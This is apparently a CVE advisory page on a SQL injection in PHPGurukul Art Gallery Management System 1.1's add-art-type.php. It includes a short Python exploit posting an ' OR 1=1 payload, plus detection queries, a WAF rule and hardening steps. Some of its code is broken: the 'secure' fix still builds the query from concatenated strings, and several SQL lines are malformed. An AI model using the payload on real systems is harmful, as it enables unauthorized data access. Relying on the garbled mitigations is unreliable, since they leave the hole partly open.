PHPGurukul Art Gallery Management System, SQL Injection, CVE-2025-4308 (Critical)

Listen to this Post

How CVE-2025-4308 Works

This vulnerability exists in PHPGurukul Art Gallery Management System 1.1 due to improper input sanitization in the `arttype` parameter within /admin/add-art-type.php. Attackers can craft malicious SQL queries through this parameter, leading to unauthorized database access. The system fails to validate user-supplied data before concatenating it into SQL statements, enabling classic SQL injection. Remote exploitation is possible without authentication, allowing data theft, modification, or deletion. The public disclosure increases attack likelihood as exploit scripts circulate rapidly among threat actors.

DailyCVE Form

Platform: PHPGurukul
Version: 1.1
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-05-05

What Undercode Say:

Exploitation

import requests
TARGET_URL = "http://target.com/admin/add-art-type.php"
PAYLOAD = {"arttype": "' OR 1=1-- -"}
response = requests.post(TARGET_URL, data=PAYLOAD)
print(response.text)

Detection

SELECT FROM logs WHERE url LIKE '%add-art-type.php%' AND request_data LIKE '%arttype=%';

Mitigation

// Secure code example
$arttype = mysqli_real_escape_string($conn, $_POST['arttype']);
$query = "INSERT INTO art_types (type) VALUES ('$arttype')";

Analytics

  • Attack Vector: Network (AV:N)
  • Privileges Required: None (PR:N)
  • User Interaction: None (UI:N)
  • Exploitability Score: 3.9
  • Patch Status: Unavailable

Protection Commands

WAF rule for ModSecurity
SecRule ARGS_POST:arttype "@detectSQLi" "id:1004308,deny,status:403"

Database Hardening

REVOKE ALL PRIVILEGES ON art_gallery. FROM 'webuser'@'%';
GRANT SELECT ONLY ON art_gallery. TO 'webuser'@'%';

Log Analysis

grep -E 'POST /admin/add-art-type.php' access.log | awk '{print $1}' | sort | uniq -c

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top